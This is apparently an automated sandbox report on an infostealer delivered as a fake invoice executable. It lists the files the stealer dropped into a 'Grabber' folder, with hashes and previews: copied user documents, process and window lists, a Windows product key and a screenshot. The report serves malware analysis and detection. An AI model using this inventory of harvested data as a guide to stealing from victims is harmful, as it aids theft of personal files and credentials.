C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\XZXHAVGRAG.xlsx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ZBEDCJPBEY.png

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.5191090305155277
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
MD5:	3A37312509712D4E12D27240137FF377
SHA1:	30CED927E23B584725CF16351394175A6D2A9577
SHA-256:	B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
SHA-512:	DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\System\Process.txt

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	17636
Entropy (8bit):	5.721485492742653
Encrypted:	false
SSDEEP:	96:u9O7/coHFowGU1dUEfws1B3Mky7zqbB/KQBfBNs+sxv4ck75eE3mRLbySBMwbJxq:oIvUEYXk+mbPsbMwHq3PtEGmWa+E1j2
MD5:	06C06E3C36739F27DAC78771BDB3A9FC
SHA1:	1F2118A76DC70607A6B183516EF10A5962B60647
SHA-256:	9B6D5328DD56999DFAC4B8825BFBBC5307D6B003257787B34FED2552C1A59A3B
SHA-512:	BC4D4E8036B952E46B4D7CCCD4B068D3C05593ADA9A0AD33C5F71E8E69045219409F9ADE1BD2FE968624E913194B283F09D328A453E28CA9D8DA6916FA932EAE
Malicious:	false
Preview:	NAME: GanfXFlZgofsfbLqWVo..PID: 6464..EXE: C:\Program Files (x86)\acDNjQhoJskYFVhnicHHAekUYpmdaRrSJoDMfyfTmfAixHegRyBMdYIRPQdX\GanfXFlZgofsfbLqWVo.exe..NAME: svchost..PID: 2152..EXE: ..NAME: explorer..PID: 2580..EXE: C:\Windows\Explorer.EXE..NAME: GanfXFlZgofsfbLqWVo..PID: 5596..EXE: C:\Program Files (x86)\acDNjQhoJskYFVhnicHHAekUYpmdaRrSJoDMfyfTmfAixHegRyBMdYIRPQdX\GanfXFlZgofsfbLqWVo.exe..NAME: fontdrvhost..PID: 784..EXE: ..NAME: GanfXFlZgofsfbLqWVo..PID: 6724..EXE: C:\Program Files (x86)\acDNjQhoJskYFVhnicHHAekUYpmdaRrSJoDMfyfTmfAixHegRyBMdYIRPQdX\GanfXFlZgofsfbLqWVo.exe..NAME: smartscreen..PID: 5584..EXE: C:\Windows\System32\smartscreen.exe..NAME: svchost..PID: 1176..EXE: ..NAME: svchost..PID: 2564..EXE: ..NAME: csrss..PID: 408..EXE: ..NAME: svchost..PID: 1724..EXE: ..NAME: sihost..PID: 3420..EXE: C:\Windows\system32\sihost.exe..NAME: dllhost..PID: 5484..EXE: ..NAME: OfficeClickToRun..PID: 2552..EXE: ..NAME: svchost..PID: 2508..EXE: ..NAME: svchost..PID: 1252..EXE: ..NAME: svchost.

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\System\ProductKey.txt

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.004364184708143
Encrypted:	false
SSDEEP:	3:FI60BBj:y60T
MD5:	52EBE27DECC6C4DF6A1A97BE0C1042BD
SHA1:	447887DA7FF110EE7C34FEA31EAAA516E518C20A
SHA-256:	96A4586A298AD718245D3422FDBCB0E4950C32BEAEA181C1F3F4E92976BC5F29
SHA-512:	BD7BB19FD8BFADD1578F44E75569B84C9603C22EEDACA317006431415D340C68A8A22C74E1F8FCC1B99A6B7A69225AFA8DDED319515E45B258F24E95915F6472
Malicious:	false
Preview:	PJN2F-JYTMH-R3M98-Y4FC8-8HPWK

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\System\ScanningNetworks.txt

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	84
Entropy (8bit):	4.6630509827051725
Encrypted:	false
SSDEEP:	3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
MD5:	58CD2334CFC77DB470202487D5034610
SHA1:	61FA242465F53C9E64B3752FE76B2ADCCEB1F237
SHA-256:	59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
SHA-512:	C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
Malicious:	false
Preview:	Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\System\Windows.txt

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	15995
Entropy (8bit):	5.670741308345806
Encrypted:	false
SSDEEP:	96:OTzmPY8Q8dltBvCUyzqRBHCkMBVl5S0xXTJy7xxtuVrpjjarRWviJ8VUdcVyW9K6:MmRUH95
MD5:	80A9CF1DEF3358C3DDCBA99D8D76B87D
SHA1:	23BA24224F9F25BA2D92748646211369B9CFB886
SHA-256:	C3C776BC83C62B753BA34F29041E615437EC41E3D9656032DB886A56AAC43402
SHA-512:	88D6B4456B9484BCD0D0D6E42B592AF383EF3BF9F7F5BCF63389DB74A7AB88E3B328671534DED234794B5107B21C0BF03C3D129D634905964441FDE460625121
Malicious:	false
Preview:	NAME: GanfXFlZgofsfbLqWVo..TITLE: New Tab - Google Chrome..PID: 6464..EXE: C:\Program Files (x86)\acDNjQhoJskYFVhnicHHAekUYpmdaRrSJoDMfyfTmfAixHegRyBMdYIRPQdX\GanfXFlZgofsfbLqWVo.exe..NAME: GanfXFlZgofsfbLqWVo..TITLE: New Tab - Google Chrome..PID: 5596..EXE: C:\Program Files (x86)\acDNjQhoJskYFVhnicHHAekUYpmdaRrSJoDMfyfTmfAixHegRyBMdYIRPQdX\GanfXFlZgofsfbLqWVo.exe..NAME: GanfXFlZgofsfbLqWVo..TITLE: New Tab - Google Chrome..PID: 6724..EXE: C:\Program Files (x86)\acDNjQhoJskYFVhnicHHAekUYpmdaRrSJoDMfyfTmfAixHegRyBMdYIRPQdX\GanfXFlZgofsfbLqWVo.exe..NAME: GanfXFlZgofsfbLqWVo..TITLE: New Tab - Google Chrome..PID: 6844..EXE: C:\Program Files (x86)\acDNjQhoJskYFVhnicHHAekUYpmdaRrSJoDMfyfTmfAixHegRyBMdYIRPQdX\GanfXFlZgofsfbLqWVo.exe..NAME: GanfXFlZgofsfbLqWVo..TITLE: New Tab - Google Chrome..PID: 6412..EXE: C:\Program Files (x86)\acDNjQhoJskYFVhnicHHAekUYpmdaRrSJoDMfyfTmfAixHegRyBMdYIRPQdX\GanfXFlZgofsfbLqWVo.exe..NAME: GanfXFlZgofsfbLqWVo..TITLE: New Tab - Google Chrome..PID: 5964..EXE: C:\Pr

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\System\WorldWind.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	86411
Entropy (8bit):	7.849614751021331
Encrypted:	false
SSDEEP:	1536:CrPmU+oyiVAoUkXM5qyJ9Pw2k3YFh8BBfCNiXiNO13cnBU0CR4VpkPGL85wfRfw1:iPmU+oyi65qyI2kg8GNiXiNO9cmR4TSj
MD5:	2F0168BCA00AF2227070F0C22E993278
SHA1:	5B674DD39D8815C7ECD447802A44A5FA3EDA8226
SHA-256:	A2F6B81CB3AE3CCA39ECCB715FDDC8F009A8344B2F41489303923C4F7CC73F8E
SHA-512:	F7E00719CDAF73BF096E2F981000845C1C06C0C5B9BB30FE2DE82D9D101B85665DD84E75C2573072BF527A2390912D519BBD346C68175107B77C5364475C7186
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-u>....k..V6....#..e...?)....^~a...b.y.}....G...1.%79.F.....W_.9Z+....]xW.._.1/...G.+.....+..&%........

C:\Users\user\AppData\Local\4b255858974b700b38b22779588bf044\msgid.dat

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	very short file (no magic)
Category:	modified
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
